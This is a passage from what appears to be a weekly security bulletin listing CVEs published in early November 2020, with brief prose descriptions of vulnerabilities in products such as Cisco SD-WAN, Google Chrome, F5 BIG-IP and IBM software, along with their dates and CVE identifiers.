ad-ldap-connector’s admin panel before version 5.0.13 does not provide csrf protection, which when exploited may result in remote code execution or confidential data loss. CSRF exploits may occur if the user visits a malicious page containing CSRF payload on the same machine that has access to the ad-ldap-connector admin console via a browser. You may be affected if you use the admin console included with ad-ldap-connector versions <=5.0.12. If you do not have ad-ldap-connector admin console enabled or do not visit any other public URL while on the machine it is installed on, you are not affected. The issue is fixed in version 5.0.13. 2020-11-06 not yet calculated CVE-2020-15259
MISC
CONFIRM
axios — axios
 
Axios NPM package 0.21.0 contains a Server-Side Request Forgery (SSRF) vulnerability where an attacker is able to bypass a proxy by providing a URL that responds with a redirect to a restricted host or IP address. 2020-11-06 not yet calculated CVE-2020-28168
MISC
b.braun_melsungen_ag — onlinesuite
 
A DLL hijacking vulnerability in the B. Braun OnlineSuite Version AP 3.0 and earlier allows local attackers to execute code on the system as a high privileged user. 2020-11-06 not yet calculated CVE-2020-25174
MISC
b.braun_melsungen_ag — onlinesuite
 
A relative path traversal attack in the B. Braun OnlineSuite Version AP 3.0 and earlier allows unauthenticated attackers to upload or download arbitrary files. 2020-11-06 not yet calculated CVE-2020-25172
MISC
b.braun_melsungen_ag — onlinesuite
 
An Excel Macro Injection vulnerability exists in the export feature in the B. Braun OnlineSuite Version AP 3.0 and earlier via multiple input fields that are mishandled in an Excel export. 2020-11-06 not yet calculated CVE-2020-25170
MISC
bookstack — bookstack
 
In BookStack before version 0.30.4, a user with permissions to edit a page could add an attached link which would execute untrusted JavaScript code when clicked by a viewer of the page. Dangerous content may remain in the database after this update. If you think this could have been exploited the linked advisory provides a SQL query to test. As a workaround, page edit permissions could be limited to only those that are trusted until you can upgrade although this will not address existing exploitation of this vulnerability. The issue is fixed in version 0.30.4. 2020-11-03 not yet calculated CVE-2020-26210
MISC
MISC
MISC
CONFIRM
bookstack — bookstack
 
In BookStack before version 0.30.4, a user with permissions to edit a page could insert JavaScript code through the use of `javascript:` URIs within a link or form which would run, within the context of the current page, when clicked or submitted. Additionally, a user with permissions to edit a page could insert a particular meta tag which could be used to silently redirect users to a alternative location upon visit of a page. Dangerous content may remain in the database but will be removed before being displayed on a page. If you think this could have been exploited the linked advisory provides a SQL query to test. As a workaround without upgrading, page edit permissions could be limited to only those that are trusted until you can upgrade although this will not address existing exploitation of this vulnerability. The issue is fixed in BookStack version 0.30.4. 2020-11-03 not yet calculated CVE-2020-26211
MISC
MISC
CONFIRM
MISC
cellinx — nvt_web_server
 
Cellinx NVT Web Server 5.0.0.014b.test 2019-09-05 allows a remote user to run commands as root via SetFileContent.cgi because authentication is on the client side. 2020-11-06 not yet calculated CVE-2020-28250
MISC
MISC
check_point — endpoint_security_client
 
Check Point Endpoint Security Client for Windows, with Anti-Bot or Threat Emulation blades installed, before version E83.20, tries to load a non-existent DLL during a query for the Domain Name. An attacker with administrator privileges can leverage this to gain code execution within a Check Point Software Technologies signed binary, where under certain circumstances may cause the client to terminate. 2020-11-02 not yet calculated CVE-2020-6014
MISC
check_point — endpoint_security_client
 
Check Point Endpoint Security for Windows before E84.10 can reach denial of service during clean install of the client which will prevent the storage of service log files in non-standard locations. 2020-11-05 not yet calculated CVE-2020-6015
MISC
cisco — anyconnect_secure_mobility_client
 
A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to read arbitrary files on the underlying operating system of an affected device. The vulnerability is due to an exposed IPC function. An attacker could exploit this vulnerability by sending a crafted IPC message to the AnyConnect process on an affected device. A successful exploit could allow the attacker to read arbitrary files on the underlying operating system of the affected device. 2020-11-06 not yet calculated CVE-2020-27123
CISCO
cisco — anyconnect_secure_mobility_client_software
 
A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client Software could allow an authenticated, local attacker to cause a targeted AnyConnect user to execute a malicious script. The vulnerability is due to a lack of authentication to the IPC listener. An attacker could exploit this vulnerability by sending crafted IPC messages to the AnyConnect client IPC listener. A successful exploit could allow an attacker to cause the targeted AnyConnect user to execute a script. This script would execute with the privileges of the targeted AnyConnect user. In order to successfully exploit this vulnerability, there must be an ongoing AnyConnect session by the targeted user at the time of the attack. To exploit this vulnerability, the attacker would also need valid user credentials on the system upon which the AnyConnect client is being run. Cisco has not released software updates that address this vulnerability. 2020-11-06 not yet calculated CVE-2020-3556
CISCO
cisco — edge_fog_fabric
 
A vulnerability in the REST API of Cisco Edge Fog Fabric could allow an authenticated, remote attacker to access files outside of their authorization sphere on an affected device. The vulnerability is due to incorrect authorization enforcement on an affected system. An attacker could exploit this vulnerability by sending a crafted request to the API. A successful exploit could allow the attacker to overwrite arbitrary files on the affected device. 2020-11-06 not yet calculated CVE-2020-26084
CISCO
cisco — identity_services_engine
 
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface of an affected device. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of an affected interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. 2020-11-06 not yet calculated CVE-2020-3551
CISCO
cisco — identity_services_engine
 
A vulnerability in the Microsoft Active Directory integration of Cisco Identity Services Engine (ISE) could allow an authenticated, local attacker to elevate privileges on an affected device. To exploit this vulnerability, an attacker would need to have a valid administrator account on an affected device. The vulnerability is due to incorrect privilege assignment. An attacker could exploit this vulnerability by logging in to the system with a crafted Active Directory account. A successful exploit could allow the attacker to obtain root privileges on an affected device. 2020-11-06 not yet calculated CVE-2020-27122
CISCO
cisco — identity_services_engine
 
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker with administrative credentials to conduct a cross-site scripting (XSS) attack against a user of the interface. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. To exploit this vulnerability, an attacker would need to have valid administrative credentials. 2020-11-06 not yet calculated CVE-2020-26083
CISCO
cisco — integrated_management_controller
 
A vulnerability in the web UI of Cisco Integrated Management Controller (IMC) could allow an authenticated, remote attacker to inject arbitrary code and execute arbitrary commands at the underlying operating system level. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted commands to the web-based management interface of the affected software. A successful exploit could allow the attacker to inject and execute arbitrary commands at the underlying operating system level. 2020-11-06 not yet calculated CVE-2020-3371
CISCO
cisco — ios_xr_64-bit_software
 
A vulnerability in the enhanced Preboot eXecution Environment (PXE) boot loader for Cisco IOS XR 64-bit Software could allow an unauthenticated, remote attacker to execute unsigned code during the PXE boot process on an affected device. The PXE boot loader is part of the BIOS and runs over the management interface of hardware platforms that are running Cisco IOS XR Software only. The vulnerability exists because internal commands that are issued when the PXE network boot process is loading a software image are not properly verified. An attacker could exploit this vulnerability by compromising the PXE boot server and replacing a valid software image with a malicious one. Alternatively, the attacker could impersonate the PXE boot server and send a PXE boot reply with a malicious file. A successful exploit could allow the attacker to execute unsigned code on the affected device. Note: To fix this vulnerability, both the Cisco IOS XR Software and the BIOS must be upgraded. The BIOS code is included in Cisco IOS XR Software but might require additional installation steps. For further information, see the Fixed Software section of this advisory. 2020-11-06 not yet calculated CVE-2020-3284
CISCO
cisco — ip_phones
 
A vulnerability in the TCP packet processing functionality of Cisco IP Phones could allow an unauthenticated, remote attacker to cause the phone to stop responding to incoming calls, drop connected calls, or unexpectedly reload. The vulnerability is due to insufficient TCP ingress packet rate limiting. An attacker could exploit this vulnerability by sending a high and sustained rate of crafted TCP traffic to the targeted device. A successful exploit could allow the attacker to impact operations of the phone or cause the phone to reload, leading to a denial of service (DoS) condition. 2020-11-06 not yet calculated CVE-2020-3574
CISCO
cisco — sd-wan_software A vulnerability in Cisco SD-WAN Software could allow an authenticated, local attacker to elevate privileges to root group on the underlying operating system. The vulnerability is due to incorrect permissions being set when the affected command is executed. An attacker could exploit this vulnerability by executing the affected command on an affected system. A successful exploit could allow the attacker to gain root privileges. 2020-11-06 not yet calculated CVE-2020-3595
CISCO
cisco — sd-wan_software
 
A vulnerability in the packet filtering features of Cisco SD-WAN Software could allow an unauthenticated, remote attacker to bypass L3 and L4 traffic filters. The vulnerability is due to improper traffic filtering conditions on an affected device. An attacker could exploit this vulnerability by crafting a malicious TCP packet with specific characteristics and sending it to a targeted device. A successful exploit could allow the attacker to bypass the L3 and L4 traffic filters and inject an arbitrary packet into the network. 2020-11-06 not yet calculated CVE-2020-3444
CISCO
cisco — sd-wan_software
 
A vulnerability in Cisco SD-WAN Software could allow an authenticated, local attacker to elevate privileges to root on the underlying operating system. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending a crafted request to a utility that is running on an affected system. A successful exploit could allow the attacker to gain root privileges. 2020-11-06 not yet calculated CVE-2020-3593
CISCO
cisco — sd-wan_software
 
A vulnerability in Cisco SD-WAN Software could allow an authenticated, local attacker to elevate privileges to root on the underlying operating system. The vulnerability is due to insufficient security controls on the CLI. An attacker could exploit this vulnerability by using an affected CLI utility that is running on an affected system. A successful exploit could allow the attacker to gain root privileges. 2020-11-06 not yet calculated CVE-2020-3600
CISCO
cisco — sd-wan_software
 
A vulnerability in Cisco SD-WAN Software could allow an authenticated, local attacker to elevate privileges to root on the underlying operating system. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by providing crafted options to a specific command. A successful exploit could allow the attacker to gain root privileges. 2020-11-06 not yet calculated CVE-2020-3594
CISCO
cisco — sd-wan_vmanage_software A vulnerability in the remote management feature of Cisco SD-WAN vManage Software could allow an authenticated, local attacker to inject arbitrary commands and potentially gain elevated privileges. The vulnerability is due to improper validation of commands to the remote management CLI of the affected application. An attacker could exploit this vulnerability by sending malicious requests to the affected application. A successful exploit could allow the attacker to inject arbitrary commands and potentially gain elevated privileges. 2020-11-06 not yet calculated CVE-2020-27129
CISCO
cisco — sd-wan_vmanage_software
 
A vulnerability in the web-based management interface of the Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. 2020-11-06 not yet calculated CVE-2020-3587
CISCO
cisco — sd-wan_vmanage_software
 
A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. 2020-11-06 not yet calculated CVE-2020-3579
CISCO
cisco — sd-wan_vmanage_software
 
A vulnerability in the web-based management interface of the Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. 2020-11-06 not yet calculated CVE-2020-3591
CISCO
cisco — sd-wan_vmanage_software
 
A vulnerability in the web-based management interface of the Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. 2020-11-06 not yet calculated CVE-2020-3590
CISCO
cisco — sd-wan_vmanage_software
 
A vulnerability in the application data endpoints of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to write arbitrary files to an affected system. The vulnerability is due to improper validation of requests to APIs. An attacker could exploit this vulnerability by sending malicious requests to an API within the affected application. A successful exploit could allow the attacker to conduct directory traversal attacks and write files to an arbitrary location on the targeted system. 2020-11-06 not yet calculated CVE-2020-27128
CISCO
cisco — sd-wan_vmanage_software
 
A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to bypass authorization and modify the configuration of an affected system. The vulnerability is due to insufficient authorization checking on an affected system. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system. A successful exploit could allow the attacker to gain privileges beyond what would normally be authorized for their configured user authorization level. This could allow the attacker to modify the configuration of an affected system. 2020-11-06 not yet calculated CVE-2020-3592
CISCO
cisco — telepresence_collaboration_endpoint_software
 
A vulnerability in the video endpoint API (xAPI) of Cisco TelePresence Collaboration Endpoint (CE) Software could allow an authenticated, remote attacker to gain access to sensitive information on an affected device. The vulnerability is due to improper storage of sensitive information on an affected device. An attacker could exploit this vulnerability by accessing information that should not be accessible to users with low privileges. A successful exploit could allow the attacker to gain access to sensitive information. 2020-11-06 not yet calculated CVE-2020-26086
CISCO
cisco — unified_communications_manager_im_and_presence_service_software
 
A vulnerability in Cisco Unified Communications Manager IM &amp; Presence Service (Unified CM IM&amp;P) Software could allow an authenticated, remote attacker to cause the Cisco XCP Authentication Service on an affected device to restart, resulting in a denial of service (DoS) condition. The vulnerability is due to improper handling of login requests. An attacker could exploit this vulnerability by sending a crafted client login request to an affected device. A successful exploit could allow the attacker to cause a process to crash, resulting in a DoS condition for new login attempts. Users who are authenticated at the time of the attack would not be affected. There are workarounds that address this vulnerability. 2020-11-06 not yet calculated CVE-2020-27121
CISCO
cisco — webex_meetings_desktop_app
 
A vulnerability in virtualization channel messaging in Cisco Webex Meetings Desktop App for Windows could allow a local attacker to execute arbitrary code on a targeted system. This vulnerability occurs when this app is deployed in a virtual desktop environment and using virtual environment optimization. This vulnerability is due to improper validation of messages processed by the Cisco Webex Meetings Desktop App. A local attacker with limited privileges could exploit this vulnerability by sending malicious messages to the affected software by using the virtualization channel interface. A successful exploit could allow the attacker to modify the underlying operating system configuration, which could allow the attacker to execute arbitrary code with the privileges of a targeted user. Note: This vulnerability can be exploited only when Cisco Webex Meetings Desktop App is in a virtual desktop environment on a hosted virtual desktop (HVD) and is configured to use the Cisco Webex Meetings virtual desktop plug-in for thin clients. 2020-11-06 not yet calculated CVE-2020-3588
CISCO
cisco — webex_network_player
 
Multiple vulnerabilities in Cisco Webex Network Recording Player for Windows and Cisco Webex Player for Windows could allow an attacker to execute arbitrary code on an affected system. The vulnerabilities are due to insufficient validation of certain elements of a Webex recording that is stored in the Advanced Recording Format (ARF) or Webex Recording Format (WRF). An attacker could exploit these vulnerabilities by sending a user a malicious ARF or WRF file through a link or email attachment and persuading the user to open the file with the affected software on the local system. A successful exploit could allow the attacker to execute arbitrary code on the affected system with the privileges of the targeted user. 2020-11-06 not yet calculated CVE-2020-3573
CISCO
cisco — webex_network_recording_player_and_webex_player
 
Multiple vulnerabilities in Cisco Webex Network Recording Player for Windows and Cisco Webex Player for Windows could allow an attacker to execute arbitrary code on an affected system. The vulnerabilities are due to insufficient validation of certain elements of a Webex recording that is stored in the Advanced Recording Format (ARF) or Webex Recording Format (WRF). An attacker could exploit these vulnerabilities by sending a user a malicious ARF or WRF file through a link or email attachment and persuading the user to open the file with the affected software on the local system. A successful exploit could allow the attacker to execute arbitrary code on the affected system with the privileges of the targeted user. 2020-11-06 not yet calculated CVE-2020-3604
CISCO
cisco — webex_network_recording_player_and_webex_player
 
Multiple vulnerabilities in Cisco Webex Network Recording Player for Windows and Cisco Webex Player for Windows could allow an attacker to execute arbitrary code on an affected system. The vulnerabilities are due to insufficient validation of certain elements of a Webex recording that is stored in the Advanced Recording Format (ARF) or Webex Recording Format (WRF). An attacker could exploit these vulnerabilities by sending a user a malicious ARF or WRF file through a link or email attachment and persuading the user to open the file with the affected software on the local system. A successful exploit could allow the attacker to execute arbitrary code on the affected system with the privileges of the targeted user. 2020-11-06 not yet calculated CVE-2020-3603
CISCO
cybozu — garoon
 
Improper input validation vulnerability in Cybozu Garoon 5.0.0 to 5.0.2 allows a remote authenticated attacker to delete some data of the bulletin board via unspecified vector. 2020-11-06 not yet calculated CVE-2020-5643
MISC
MISC
databaseschemaviewer — databaseschemaviewer
 
DatabaseSchemaViewer before version 2.7.4.3 is vulnerable to arbitrary code execution if a user is tricked into opening a specially crafted `.dbschema` file. The patch was released in v2.7.4.3. As a workaround, ensure `.dbschema` files from untrusted sources are not opened. 2020-11-04 not yet calculated CVE-2020-26207
MISC
MISC
CONFIRM
debian — bounty_castle_bc
 
In Legion of the Bouncy Castle BC before 1.55 and BC-FJA before 1.0.1.2, attackers can obtain sensitive information about a private exponent because of Observable Differences in Behavior to Error Inputs. This occurs in org.bouncycastle.crypto.encodings.OAEPEncoding. Sending invalid ciphertext that decrypts to a short payload in the OAEP Decoder could result in the throwing of an early exception, potentially leaking some information about the private exponent of the RSA private key performing the encryption. 2020-11-02 not yet calculated CVE-2020-26939
MISC
MISC
MLIST
debian — raptor_xml_writer.c
 
raptor_xml_writer_start_element_common in raptor_xml_writer.c in Raptor RDF Syntax Library 2.0.15 miscalculates the maximum nspace declarations for the XML writer, leading to heap-based buffer overflows (sometimes seen in raptor_qname_format_as_xml). 2020-11-06 not yet calculated CVE-2017-18926
MISC
MLIST
DEBIAN
MISC
eramba — eramba
 
eramba through c2.8.1 allows HTTP Host header injection with (for example) resultant wkhtml2pdf PDF printing by authenticated users. 2020-11-02 not yet calculated CVE-2020-28031
MISC
MISC
f5 — big-ip In versions 14.1.0-14.1.0.1 and 14.1.2.5-14.1.2.7, when a BIG-IP object is created or listed through the REST interface, the protected fields are obfuscated in the REST response, not protected via a SecureVault cryptogram as TMSH does. One example of protected fields is the GTM monitor password. 2020-11-05 not yet calculated CVE-2020-5943
MISC
f5 — big-ip In BIG-IP Advanced WAF and FPS versions 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, and 14.1.0-14.1.2.7, under some circumstances, certain format client-side alerts sent to the BIG-IP virtual server configured with DataSafe may cause the Traffic Management Microkernel (TMM) to restart, resulting in a Denial-of-Service (DoS). 2020-11-05 not yet calculated CVE-2020-5946
MISC
f5 — big-ip
 
In versions 16.0.0-16.0.0.1, 15.1.0-15.1.0.3, 15.0.0-15.0.1.3, 14.1.0-14.1.2.6, and 13.1.0-13.1.3.4, BIG-IP Virtual Edition (VE) systems on VMware, with an Intel-based 85299 Network Interface Controller (NIC) card and Single Root I/O Virtualization (SR-IOV) enabled on vSphere, may fail and leave the Traffic Management Microkernel (TMM) in a state where it cannot transmit traffic. 2020-11-05 not yet calculated CVE-2020-5939
MISC
f5 — big-ip
 
On BIG-IP versions 16.0.0-16.0.0.1 and 15.1.0-15.1.0.5, using the RESOLV::lookup command within an iRule may cause the Traffic Management Microkernel (TMM) to generate a core file and restart. This issue occurs when data exceeding the maximum limit of a hostname passes to the RESOLV::lookup command. 2020-11-05 not yet calculated CVE-2020-5941
MISC
f5 — big-ip
 
In BIG-IQ 7.1.0, accessing the DoS Summary events and DNS Overview pages in the BIG-IQ system interface returns an error message due to disabled Grafana reverse proxy in web service configuration. 2020-11-05 not yet calculated CVE-2020-5944
MISC
f5 — big-ip
 
In BIG-IP versions 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, and 14.1.0-14.1.2.7, undisclosed TMUI page contains a stored cross site scripting vulnerability (XSS). The issue allows a minor privilege escalation for resource admin to escalate to full admin. 2020-11-05 not yet calculated CVE-2020-5945
MISC
f5 — big-ip
 
In versions 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, and 14.1.0-14.1.2.3, a stored cross-site scripting (XSS) vulnerability exists in an undisclosed page of the BIG-IP Traffic Management User Interface (TMUI), also known as the BIG-IP Configuration utility. 2020-11-05 not yet calculated CVE-2020-5940
MISC
f5 — big-ip
 
In BIG-IP PEM versions 16.0.0-16.0.0.1, 15.1.0-15.1.0.5, 14.1.0-14.1.2.7, 13.1.0-13.1.3.4, 12.1.0-12.1.5.2, and 11.6.1-11.6.5.2, when processing Capabilities-Exchange-Answer (CEA) packets with certain attributes from the Policy and Charging Rules Function (PCRF) server, the Traffic Management Microkernel (TMM) may generate a core file and restart. 2020-11-05 not yet calculated CVE-2020-5942
MISC
foxit — reader
 
Foxit Reader before 10.0 allows Remote Command Execution via the app.opencPDFWebPage JavsScript API. An attacker can execute local files and bypass the security dialog. 2020-11-02 not yet calculated CVE-2020-14425
MISC
MISC
MISC
fruitywifi_project — fruitywifi
 
A remote code execution vulnerability is identified in FruityWifi through 2.4. Due to improperly escaped shell metacharacters obtained from the POST request at the page_config_adv.php page, it is possible to perform remote code execution by an authenticated attacker. This is similar to CVE-2018-17317. 2020-11-05 not yet calculated CVE-2020-24849
MISC
MISC
MISC
fuel — cms
 
In FUEL CMS 11.4.12 and before, the page preview feature allows an anonymous user to take complete ownership of any account including an administrator one. 2020-11-04 not yet calculated CVE-2020-26167
MISC
MISC
MISC
MISC
git-lfs — git-lfs
 
Git LFS 2.12.0 allows Remote Code Execution. 2020-11-05 not yet calculated CVE-2020-27955
MISC
FULLDISC
MISC
MISC
MISC
MISC
google — chrome Insufficient policy enforcement in Intents in Google Chrome on Android prior to 86.0.4240.75 allowed a local attacker to bypass navigation restrictions via crafted Intents. 2020-11-03 not yet calculated CVE-2020-15980
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome Insufficient policy enforcement in extensions in Google Chrome prior to 86.0.4240.75 allowed an attacker who convinced a user to install a malicious extension to bypass same origin policy via a crafted Chrome Extension. 2020-11-03 not yet calculated CVE-2020-15973
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome Insufficient data validation in installer in Google Chrome prior to 86.0.4240.183 allowed a local attacker to potentially elevate privilege via a crafted filesystem. 2020-11-03 not yet calculated CVE-2020-16007
SUSE
SUSE
MISC
MISC
google — chrome Stack buffer overflow in WebRTC in Google Chrome prior to 86.0.4240.183 allowed a remote attacker to potentially exploit stack corruption via a crafted WebRTC packet. 2020-11-03 not yet calculated CVE-2020-16008
SUSE
SUSE
MISC
MISC
google — chrome
 
Use after free in Blink in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-11-03 not yet calculated CVE-2020-15968
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome
 
Uninitialized data in PDFium in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted PDF file. 2020-11-03 not yet calculated CVE-2020-15989
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome
 
Use after free in NFC in Google Chrome prior to 86.0.4240.75 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. 2020-11-03 not yet calculated CVE-2020-15970
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome
 
Use after free in printing in Google Chrome prior to 86.0.4240.75 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. 2020-11-03 not yet calculated CVE-2020-15971
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome
 
Use after free in audio in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-11-03 not yet calculated CVE-2020-15972
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome
 
Use after free in WebRTC in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 2020-11-03 not yet calculated CVE-2020-15969
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome
 
Use after free in payments in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. 2020-11-03 not yet calculated CVE-2020-15967
SUSE
MISC
MISC
FEDORA
FEDORA
google — chrome
 
Use after free in WebRTC in Google Chrome prior to 86.0.4240.75 allowed a remote attacker to potentially exploit heap corruption via a crafted WebRTC stream. 2020-11-03 not yet calculated CVE-2020-15987
SUSE
MISC
MISC
FEDORA
FEDORA
hashicorp — consul_enterprise
 
HashiCorp Consul Enterprise version 1.7.0 up to 1.8.4 includes a namespace replication bug which can be triggered to cause denial of service via infinite Raft writes. Fixed in 1.7.9 and 1.8.5. 2020-11-04 not yet calculated CVE-2020-25201
CONFIRM
MISC
hcl — digital_experience
 
HCL Digital Experience 8.5, 9.0, 9.5 is susceptible to cross site scripting (XSS). One subcomponent is vulnerable to reflected XSS. In reflected XSS, an attacker must induce a victim to click on a crafted URL from some delivery mechanism (email, other web site). 2020-11-05 not yet calculated CVE-2020-14222
MISC
hcl — notes
 
In HCL Notes version 9 previous to release 9.0.1 FixPack 10 Interim Fix 8, version 10 previous to release 10.0.1 FixPack 6 and version 11 previous to 11.0.1 FixPack 1, a vulnerability in the input parameter handling of the Notes Client could potentially be exploited by an attacker resulting in a buffer overflow. This could enable an attacker to crash HCL Notes or execute attacker-controlled code on the client. 2020-11-05 not yet calculated CVE-2020-4097
MISC
hcl — notes
 
HCL Notes versions previous to releases 9.0.1 FP10 IF8, 10.0.1 FP6 and 11.0.1 FP1 is susceptible to a Stored Cross-site Scripting (XSS) vulnerability. An attacker could use this vulnerability to execute script in a victim’s Web browser within the security context of the hosting Web site and/or steal the victim’s cookie-based authentication credentials. 2020-11-05 not yet calculated CVE-2020-14240
MISC
hewlett_packard_enterprise — oneview_and_synergy_composer
 
There is a remote escalation of privilege possible for a malicious user that has a OneView account in OneView and Synergy Composer. HPE has provided updates to Oneview and Synergy Composer: Update to version 5.5 of OneView, Composer, or Composer2. 2020-11-06 not yet calculated CVE-2020-7198
MISC
hewlett_packard_enterprise — proliant_gen10_servers A local elevation of privilege using physical access security vulnerability was found in HPE Proliant Gen10 Servers using Intel Innovation Engine (IE). This attack requires a physical attack to the server motherboard. To mitigate this issue, ensure your server is always physically secured. HPE will not address this issue in the impacted Gen 10 servers listed. HPE recommends using appropriate physical security methods as a compensating control to disallow an attacker from having physical access to the server main circuit board. 2020-11-05 not yet calculated CVE-2020-7207
MISC
hindotech — hk1_s905x3_tv_box
 
The HK1 Box S905X3 TV Box contains a vulnerability that allows a local unprivileged user to escalate to root using the /system/xbin/su binary via a serial port (UART) connection or using adb. 2020-11-05 not yet calculated CVE-2020-27402
MISC
MISC
MISC
MISC
MISC
horizontcms — horizontcms
 
An unrestricted file upload issue in HorizontCMS through 1.0.0-beta allows an authenticated remote attacker (with access to the FileManager) to upload and execute arbitrary PHP code by uploading a PHP payload, and then using the FileManager’s rename function to provide the payload (which will receive a random name on the server) with the PHP extension, and finally executing the PHP file via an HTTP GET request to /storage/<php_file_name>. NOTE: the vendor has patched this while leaving the version number at 1.0.0-beta. 2020-11-05 not yet calculated CVE-2020-27387
MISC
MISC
ibm — app_connect_enerprise_certified_container
 
IBM App Connect Enterprise Certified Container 1.0.0, 1.0.1, 1.0.2, 1.0.3, and 1.0.4 could allow a remote attacker to hijack the clicking action of the victim. By persuading a victim to visit a malicious Web site, a remote attacker could exploit this vulnerability to hijack the victim’s click actions and possibly launch further attacks against the victim. IBM X-Force ID: 189219. 2020-11-03 not yet calculated CVE-2020-4785
XF
CONFIRM
ibm — maximo_anywhere
 
IBM Maximo Anywhere 7.6.2.0, 7.6.2.1, 7.6.3.0, and 7.6.3.1 applications can be installed on a deprecated operating system version that could compromised the confidentiality and integrity of the service. IBM X-Force ID: 161486 2020-11-03 not yet calculated CVE-2019-4349
XF
CONFIRM
ibm — qradar_siem
 
IBM QRadar SIEM 7.3 and 7.4 n a multi tenant configuration could be vulnerable to information disclosure. IBM X-Force ID: 147440. 2020-11-05 not yet calculated CVE-2018-1725
XF
CONFIRM
ibm — urbancode_deploy
 
IBM UrbanCode Deploy (UCD) 6.2.7.3, 6.2.7.4, 7.0.3.0, and 7.0.4.0 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 181857. 2020-11-06 not yet calculated CVE-2020-4483
XF
CONFIRM
ibm — urbancode_deploy
 
IBM Planning Analytics Local 2.0.9.2 and IBM Planning Analytics Workspace 57 could expose data to non-privleged users by not invalidating TM1Web user sessions. IBM X-Force ID: 186022. 2020-11-03 not yet calculated CVE-2020-4649
XF
CONFIRM
ibm — urbancode_deploy
 
IBM UrbanCode Deploy (UCD) 6.2.7.3, 6.2.7.4, 7.0.3.0, and 7.0.4.0 could allow an authenticated user to bypass security. A user with access to a snapshot could apply unauthorized additional statuses via direct rest calls. IBM X-Force ID: 181856. 2020-11-06 not yet calculated CVE-2020-4482
XF
CONFIRM
ibm — urbancode_deploy
 
IBM UrbanCode Deploy (UCD) 6.2.7.3, 6.2.7.4, 7.0.3.0, and 7.0.4.0 could disclose sensitive information to an authenticated user that could be used in further attacks against the system. IBM X-Force ID: 181858. 2020-11-06 not yet calculated CVE-2020-4484
XF
CONFIRM
immuta — immuta
 
Immuta v2.8.2 accepts user-supplied project names without properly sanitizing the input, allowing attackers to inject arbitrary HTML content that is rendered as part of the application. An attacker could leverage this to redirect application users to a phishing website in an attempt to steal credentials. 2020-11-05 not yet calculated CVE-2020-15951
MISC
MISC
MISC
immuta — immuta
 
Immuta v2.8.2 is affected by improper session management: user sessions are not revoked upon logout. 2020-11-05 not yet calculated CVE-2020-15950
MISC
MISC
MISC
immuta — immuta
 
Immuta v2.8.2 is affected by one instance of insecure permissions that can lead to user account takeover. 2020-11-05 not yet calculated CVE-2020-15949
MISC
MISC
MISC
immuta — immuta
 
Immuta v2.8.2 is affected by stored XSS that allows a low-privileged user to escalate privileges to administrative permissions. Additionally, unauthenticated attackers can phish unauthenticated Immuta users to steal credentials or force actions on authenticated users through reflected, DOM-based XSS. 2020-11-05 not yet calculated CVE-2020-15952
MISC
MISC
MISC
intelliants — subrion_cms
 
